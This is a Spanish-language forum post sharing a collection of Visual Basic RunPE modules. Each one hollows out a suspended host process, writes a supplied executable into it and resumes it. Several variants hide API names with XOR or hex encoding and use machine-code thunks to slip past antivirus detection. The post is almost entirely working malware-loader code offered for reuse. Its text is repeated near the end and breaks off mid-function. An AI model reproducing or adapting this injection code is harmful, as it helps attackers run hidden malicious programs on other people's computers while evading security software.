13 Years of Service
95%
Hola a todos
Vengo a dejarles esta recoleccion de RunPe Que encontre en dekoders.
La recoleccion fue hecha por DarkCompany96.
Espero que les sirva.
Aqui va:
By Jhonjhon_123
[lenguaje=vb]Option Explicit
' ****************************************************************************************************************************** '
'
' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer)
' --- Descripción: RunPe + CallApiByName
' --- Distribución: Libre
' --- Terminos De Uso:
' --- Prohibida su comercialización.
' --- No Debe eliminar los creditos.
'
' --- Funciones:
' --- IniciarDDLL()
' - Inicializa la configuración
'
' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
' - RunPE
' * sName: Ruta al exe
' * bBytes: Bytes a ejecutar
'
' ****************************************************************************************************************************** '
Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Dim bMoveMem(36) As Byte
Public Sub IniciarDDLL()
Dim vTMP As Variant
Dim D As Long
For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)
bMoveMem(D) = CByte(vTMP): D = D + 1
Next
End Sub
'By Cobein
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
On Error Resume Next
Dim lPtr As Long
Dim bvASM(&HEC00& - 1) As Byte
Dim i As Long
Dim lMod As Long
lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
If lMod = 0 Then Exit Function
lPtr = VarPtr(bvASM(0))
RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2
For i = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4
Next
RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function
' By Strike Bot
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)
Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)
End Sub
' By Jhonjhon_123
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
On Error Resume Next
Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER
Dim bInh(247) As Byte ' IMAGE_NT_HEADERS
Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER
Dim bPi(15) As Byte ' PROCESS_INFORMATION
Dim bSi(67) As Byte ' STARTUPINFO
Dim bCtx(203) As Byte ' CONTEXT86
Dim e_lfanew As Long
Dim ImageBase As Long
Dim hProcess As Long
Dim hThread As Long
Dim SizeOfImage As Long
Dim SizeOfHeaders As Long
Dim AddressOfEntryPoint As Long
Dim NumberOfSections As Integer
Dim VirtualAddress As Long
Dim PointerToRawData As Long
Dim SizeOfRawData As Long
Dim Ebx As Long
Dim Eax As Long
Dim lTemp As Long
Dim D As Long
lTemp = 68
MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&
lTemp = &H10007
MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&
MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&
MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&
MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&
MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&
MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&
MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&
MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&
MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&
Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))
MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&
MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&
Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)
Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)
For D = 0 To NumberOfSections - 1
MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&
MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&
MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&
MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)
Next
Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))
MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&
Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)
lTemp = ImageBase + AddressOfEntryPoint
MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&
Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))
Call Call_("kernel32", "ResumeThread", hThread)
End Sub[/lenguaje]
Modded KrunPE
[lenguaje=vb]Public Function Inject(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
Dim hModuleBase As Long
Dim hPE As Long
Dim hSec As Long
Dim ImageBase As Long
Dim i As Long
Dim tSTARTUPINFO(16) As Long
Dim tPROCESS_INFORMATION(3) As Long
Dim tCONTEXT(50) As Long
Dim kernel32 As String
Dim NTDLL As String
kernel32 = "KERNEL32"
NTDLL = "NTDLL"
hModuleBase = VarPtr(bvBuff(CLng("0")))
If Not GetNumb(hModuleBase, CLng("2")) = &H5A4D Then Exit Function
hPE = hModuleBase + GetNumb(hModuleBase + &H3C)
If Not GetNumb(hPE) = &H4550 Then Exit Function
ImageBase = GetNumb(hPE + &H34)
tSTARTUPINFO(CLng("0")) = &H44
Call Geheim("kernel32", "CreateProcessW", CLng("0"), StrPtr(sHost), CLng("0"), CLng("0"), CLng("0"), &H4, CLng("0"), CLng("0"), VarPtr(tSTARTUPINFO(CLng("0"))), VarPtr(tPROCESS_INFORMATION(CLng("0"))))
Call Geheim("NTDLL", "NtUnmapViewOfSection", tPROCESS_INFORMATION(CLng("0")), ImageBase)
Call Geheim("NTDLL", "NtAllocateVirtualMemory", tPROCESS_INFORMATION(CLng("0")), VarPtr(ImageBase), CLng("0"), VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)
Call Geheim("NTDLL", "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), ImageBase, VarPtr(bvBuff(CLng("0"))), GetNumb(hPE + &H54), CLng("0"))
For i = CLng("0") To GetNumb(hPE + &H6, 2) - CLng("1")
hSec = hPE + &HF8 + (&H28 * i)
Call Geheim(NTDLL, "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), CLng("0"))
Next i
tCONTEXT(CLng("0")) = &H10007
Call Geheim("NTDLL", "NtGetContextThread", tPROCESS_INFORMATION(CLng("1")), VarPtr(tCONTEXT(CLng("0"))))
Call Geheim("NTDLL", "NtWriteVirtualMemory", tPROCESS_INFORMATION(CLng("0")), tCONTEXT(CLng("41")) + &H8, VarPtr(ImageBase), &H4, CLng("0"))
tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)
Call Geheim("NTDLL", "NtSetContextThread", tPROCESS_INFORMATION(CLng("1")), VarPtr(tCONTEXT(CLng("0"))))
Call Geheim("NTDLL", "NtResumeThread", tPROCESS_INFORMATION(CLng("1")), CLng("0"))
hProcess = tPROCESS_INFORMATION(CLng("0"))
Inject = CLng("1")
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
Call Geheim("NTDLL", "NtWriteVirtualMemory", -1, VarPtr(GetNumb), lPtr, lSize, CLng("0"))
End Function[/lenguaje]
Modded RunPE by f0rce
[lenguaje=vb]Private Const sKernel32Lib As String = "KERNEL32"
Private Const sNtdlllib As String = "NTDLL"
Private Const sCreateProcessW As String = "CreateProcessW"
Private Const sNtUnmapViewOfSection As String = "NtUnmapViewOfSection"
Private Const sNtAllocateVirtualMemory As String = "NtAllocateVirtualMemory"
Private Const sNtWriteVirtualMemory As String = "NtWriteVirtualMemory"
Private Const sNtGetContextThread As String = "NtGetContextThread"
Private Const sNtSetContextThread As String = "NtSetContextThread"
Private Const sNtResumeThread As String = "NtResumeThread"
Private Const sEKey As String = "Passwort"
Public Function RunPE(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Long
Dim hModuleBase As Long
Dim hPE As Long
Dim hSec As Long
Dim ImageBase As Long
Dim i As Long
Dim tSTARTUPINFO(16) As Long
Dim tPROCESS_INFORMATION(3) As Long
Dim tCONTEXT(50) As Long
Dim kernel32 As String
Dim NTDLL As String
hModuleBase = VarPtr(bvBuff(0))
If Not GetNumb(hModuleBase, 2) = &H5A4D Then Exit Function
hPE = hModuleBase + GetNumb(hModuleBase + &H3C)
If Not GetNumb(hPE) = &H4550 Then Exit Function
ImageBase = GetNumb(hPE + &H34)
tSTARTUPINFO(0) = &H44
Call CallApi(XORDecryption(sKernel32Lib, sEKey), XORDecryption(sCreateProcessW, sEKey), 0, StrPtr(sHost), StrPtr(sParams), 0, 0, &H4, 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtUnmapViewOfSection, sEKey), tPROCESS_INFORMATION(0), ImageBase)
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtAllocateVirtualMemory, sEKey), tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + &H54), 0)
For i = 0 To GetNumb(hPE + &H6, 2) - 1
hSec = hPE + &HF8 + (&H28 * i)
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), 0)
Next i
tCONTEXT(0) = &H10007
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtGetContextThread, sEKey), tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), tPROCESS_INFORMATION(0), tCONTEXT(41) + &H8, VarPtr(ImageBase), &H4, 0)
tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtSetContextThread, sEKey), tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtResumeThread, sEKey), tPROCESS_INFORMATION(1), 0)
hProcess = tPROCESS_INFORMATION(0)
RunPE = 1
End Function
Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
Call CallApi(XORDecryption(sNtdlllib, sEKey), XORDecryption(sNtWriteVirtualMemory, sEKey), -1, VarPtr(GetNumb), lPtr, lSize, 0)
End Function
Public Function CallApi()
End Function
Public Function XORDecryption(DataIn As String, CodeKey As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To (Len(DataIn) / 2)
intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
Next lonDataPtr
XORDecryption = strDataOut
End Function[/lenguaje]
Cobein RunPe
[lenguaje=vb]'---------------------------------------------------------------------------------------
' Module : cNtPEL
' DateTime : 30/06/2009 06:32
' Author : Cobein
' Purpose : Inject Exe
' Usage : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
' applications, but you may not reproduce
' or publish this code on any web site,
' online service, or distribute as source
' on any media without express permission.
'
' Thanks to : This is gonna be a looong list xD
' Batfitch - kernel base asm
' Karcrack - For helping me to debug and test it
' Paul Caton - vTable patch examples
' rm_code - First call api prototype
' and different books and pappers
'
' Compile : P-Code !!!
'
' Comments : Coded on top of the invoke module.
'
'---------------------------------------------------------------------------------------
Option Explicit
Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D&
Private Const IMAGE_NT_SIGNATURE As Long = &H4550&
Private Const SIZE_DOS_HEADER As Long = &H40
Private Const SIZE_NT_HEADERS As Long = &HF8
Private Const SIZE_EXPORT_DIRECTORY As Long = &H28
Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28
Private Const THUNK_APICALL As String = "8B4C240851E85989016631C0C3"
Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3"
Private Const PATCH1 As String = ""
Private Const PATCH2 As String = ""
Private Const CONTEXT_FULL As Long = &H10007
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private Type CONTEXT
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_EXPORT_DIRECTORY
Characteristics As Long
TimeDateStamp As Long
MajorVersion As Integer
MinorVersion As Integer
lpName As Long
Base As Long
NumberOfFunctions As Long
NumberOfNames As Long
lpAddressOfFunctions As Long
lpAddressOfNames As Long
lpAddressOfNameOrdinals As Long
End Type
Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long
End Type
Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)
Private c_lKrnl As Long
Private c_lLoadLib As Long
Private c_bInit As Boolean
Private c_lVTE As Long
Private c_lOldVTE As Long
Private c_bvASM(&HFF) As Byte
Public Function zDoNotCall() As Long
'This function will be replaced with machine code laterz
'Do not add any public procedure on top of it
End Function
Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean
Dim i As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
Dim tSTARTUPINFO As STARTUPINFO
Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
Dim tCONTEXT As CONTEXT
Dim lKernel As Long
Dim lNTDll As Long
Dim lMod As Long
If Not c_bInit Then Exit Function
Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER)
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS)
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
'kernel32
lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC
'ntdll
lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC
If sHost = vbNullString Then
sHost = Space(260)
'GetModuleFileNameW
lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC
Invoke lMod, App.hInstance, StrPtr(sHost), 260
End If
With tIMAGE_NT_HEADERS.OptionalHeader
tSTARTUPINFO.cb = Len(tSTARTUPINFO)
'CreateProcessW
lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC
Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
'NtUnmapViewOfSection
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
'VirtualAllocEx
lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
'NtWriteVirtualMemory
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
Next i
tCONTEXT.ContextFlags = CONTEXT_FULL
'NtGetContextThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
'NtWriteVirtualMemory
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
'NtSetContextThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
'NtResumeThread
lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC
Invoke lMod, tPROCESS_INFORMATION.hThread, 0
hProc = tPROCESS_INFORMATION.hProcess
End With
RunPE = True
End Function
Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long
Dim lPtr As Long
Dim i As Long
Dim sData As String
Dim sParams As String
If lMod = 0 Then Exit Function
For i = UBound(Params) To 0 Step -1
sParams = sParams & "68" & GetLong(CLng(Params(i)))
Next
lPtr = VarPtr(c_bvASM(0))
lPtr = lPtr + (UBound(Params) + 2) * 5
lPtr = lMod - lPtr - 5
sData = THUNK_APICALL
sData = Replace(sData, PATCH1, sParams)
sData = Replace(sData, PATCH2, GetLong(lPtr))
Call PutThunk(sData)
Invoke = PatchCall
End Function
Private Function GetLong(ByVal lData As Long) As String
Dim bvTemp(3) As Byte
Dim i As Long
CpyMem bvTemp(0), lData, &H4
For i = 0 To 3
GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2)
Next
End Function
Private Sub PutThunk(ByVal sThunk As String)
Dim i As Long
For i = 0 To Len(sThunk) - 1 Step 2
c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2))
Next i
End Sub
Private Function PatchCall() As Long
CpyMem c_lVTE, ByVal ObjPtr(Me), &H4
c_lVTE = c_lVTE + &H1C
CpyMem c_lOldVTE, ByVal c_lVTE, &H4
CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4
PatchCall = zDoNotCall
CpyMem ByVal c_lVTE, c_lOldVTE, &H4
End Function
Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long
GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc)
End Function
Public Function LoadLibrary(ByVal sLib As String) As Long
LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar))
End Function
Public Property Get Initialized() As Boolean
Initialized = c_bInit
End Property
Public Sub Class_Initialize()
Call PutThunk(THUNK_KERNELBASE)
c_lKrnl = PatchCall
If Not c_lKrnl = 0 Then
c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW")
If Not c_lLoadLib = 0 Then
c_bInit = True
End If
End If
End Sub
Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY
Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER)
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS)
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
Dim lVAddress As Long
Dim lVSize As Long
Dim lBase As Long
With tIMAGE_NT_HEADERS.OptionalHeader
lVAddress = lMod + .DataDirectory(0).VirtualAddress
lVSize = lVAddress + .DataDirectory(0).Size
lBase = .ImageBase
End With
Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY)
Dim i As Long
Dim lFunctAdd As Long
Dim lNameAdd As Long
Dim lNumbAdd As Long
With tIMAGE_EXPORT_DIRECTORY
For i = 0 To .NumberOfNames - 1
CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4
If StringFromPtr(lBase + lNameAdd) = sProc Then
CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2
CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4
GetProcAddress = lFunctAdd + lBase
If GetProcAddress >= lVAddress And _
GetProcAddress <= lVSize Then
Call ResolveForward(GetProcAddress, lMod, sProc)
If Not lMod = 0 Then
GetProcAddress = GetProcAddress(lMod, sProc)
Else
GetProcAddress = 0
End If
End If
Exit Function
End If
Next
End With
End Function
Private Function ResolveForward( _
ByVal lAddress As Long, _
ByRef lLib As Long, _
ByRef sMod As String)
Dim sForward As String
sForward = StringFromPtr(lAddress)
If InStr(1, sForward, ".") Then
lLib = LoadLibrary(Split(sForward, ".")(0))
sMod = Split(sForward, ".")(1)
End If
End Function
Private Function StringFromPtr( _
ByVal lAddress As Long) As String
Dim bChar As Byte
Do
CpyMem bChar, ByVal lAddress, 1
lAddress = lAddress + 1
If bChar = 0 Then Exit Do
StringFromPtr = StringFromPtr & Chr$(bChar)
Loop
End Function
Private Function nlfpkgnrj(ByVal sData As String) As String
Dim i As Long
For i = 1 To Len(sData) Step 2
nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2)))
Next i
End Function[/lenguaje]
Saludos ;D
Vengo a dejarles esta recoleccion de RunPe Que encontre en dekoders.
La recoleccion fue hecha por DarkCompany96.
Espero que les sirva.
Aqui va:
By Jhonjhon_123
[lenguaje=vb]Option Explicit
' ****************************************************************************************************************************** '
'
' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer)
' --- Descripción: RunPe + CallApiByName
' --- Distribución: Libre
' --- Terminos De Uso:
' --- Prohibida su comercialización.
' --- No Debe eliminar los creditos.
'
' --- Funciones:
' --- IniciarDDLL()
' - Inicializa la configuración
'
' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
' - RunPE
' * sName: Ruta al exe
' * bBytes: Bytes a ejecutar
'
' ****************************************************************************************************************************** '
Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Dim bMoveMem(36) As Byte
Public Sub IniciarDDLL()
Dim vTMP As Variant
Dim D As Long
For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)
bMoveMem(D) = CByte(vTMP): D = D + 1
Next
End Sub
'By Cobein
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
On Error Resume Next
Dim lPtr As Long
Dim bvASM(&HEC00& - 1) As Byte
Dim i As Long
Dim lMod As Long
lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
If lMod = 0 Then Exit Function
lPtr = VarPtr(bvASM(0))
RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4
RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2
For i = UBound(Params) To 0 Step -1
